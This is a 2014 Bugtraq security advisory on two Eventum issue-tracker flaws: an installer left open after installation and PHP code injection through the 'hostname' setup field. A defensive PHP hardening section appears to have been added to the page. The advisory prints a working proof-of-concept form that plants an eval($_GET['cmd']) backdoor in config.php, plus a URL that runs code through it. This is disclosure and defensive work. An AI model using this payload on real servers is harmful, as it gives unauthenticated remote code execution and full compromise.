
List:       bugtraq
Subject:    Multiple Vulnerabilities in Eventum
From:       High-Tech Bridge Security Research <advisory () htbridge ! com>
Date:       2014-01-27 13:40:20
Message-ID: 20140127134020.DE0772C587EA () htbridge ! ch

Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  January 22, 2014  [without technical details]
Vendor Notification: January 22, 2014 
Vendor Patch: January 24, 2014 
Public Disclosure: January 27, 2014 
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical 
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerabilities in Eventum which can be exploited to reinstall and compromise the vulnerable application.


1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to incorrect default permissions set for installation scripts. Access to the installation script located at "/setup/index.php" is not restricted by default, and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the vulnerable application.

The installation script can be accessed by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php


2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname", which is written into the "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with the privileges of the webserver. Successful exploitation requires access to the application's database, which can be achieved by providing the address of an attacker-controlled MySQL server.

The following exploitation example injects a backdoor into the "/config/config.php" file:


<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>


After a successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;
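The two weaknesses above map to two installer controls: an installer lock so "/setup/index.php" cannot be re-run once the application is installed (CWE-276), and safe persistence of the "hostname" value into "config.php" instead of splicing it into PHP source (CWE-94). The following is an added illustration written for this page; it is not Eventum's code and does not claim to match the vendor's patch. The file names, the "$config" array layout and the helper function names are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example, not Eventum's own code. Requires PHP 7 or later.
// Paths and the $config layout are assumptions made for the illustration.

// --- Installer lock (CWE-276) -----------------------------------------------
// Refuse to run the installer once a configuration file or a lock file exists.
// The setup entry point should call this before touching the database or config.
function setup_allowed(string $configPath, string $lockPath): bool
{
    return !file_exists($configPath) && !file_exists($lockPath);
}

// --- Vulnerable pattern (CWE-94) --------------------------------------------
// Raw input is spliced into PHP source as a string literal. A value containing a
// closing quote ends the literal and everything after it is parsed as PHP code.
function build_config_unsafe(string $hostname): string
{
    return "<?php\n\$config['hostname'] = ('" . $hostname . "');\n";
}

// --- Hardened pattern --------------------------------------------------------
// 1. Validate: only RFC 1123 host-name labels separated by dots, at most 253 chars.
function is_valid_hostname(string $value): bool
{
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($value) <= 253
        && preg_match('/^' . $label . '(?:\.' . $label . ')*$/i', $value) === 1;
}

// 2. Serialise with var_export(), which emits a correctly escaped PHP literal,
//    so the stored value can never change the structure of the generated source.
function build_config_safe(string $hostname): string
{
    if (!is_valid_hostname($hostname)) {
        throw new InvalidArgumentException('hostname is not a valid host name');
    }
    return "<?php\n\$config['hostname'] = " . var_export($hostname, true) . ";\n";
}

// Demonstration with constructed inputs: a normal host name passes, and a
// quote-breaking value of the shape shown in the advisory is rejected by the
// validator (and would stay a harmless string literal under var_export() anyway).
$good = 'tracker.example.test';
$bad  = "'); x(); \$tmp=('";

echo build_config_safe($good);
echo build_config_unsafe($bad);      // shows the literal being broken open
echo var_export($bad, true), "\n";   // same value, kept inside one literal
try {
    build_config_safe($bad);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The validator is deliberately strict rather than an escaping routine: a database host name has a well-defined shape, so rejecting anything else removes the injection class entirely, while var_export() guarantees correct quoting for whatever does pass. Pair both with the lock check, since a config writer that is safe but still reachable after installation would still let an unauthenticated party repoint the application at a different database.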

-----------------------------------------------------------------------------------------------


Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

The vendor disclosed the vulnerabilities and authorized us to release the advisory publicly before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE ® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

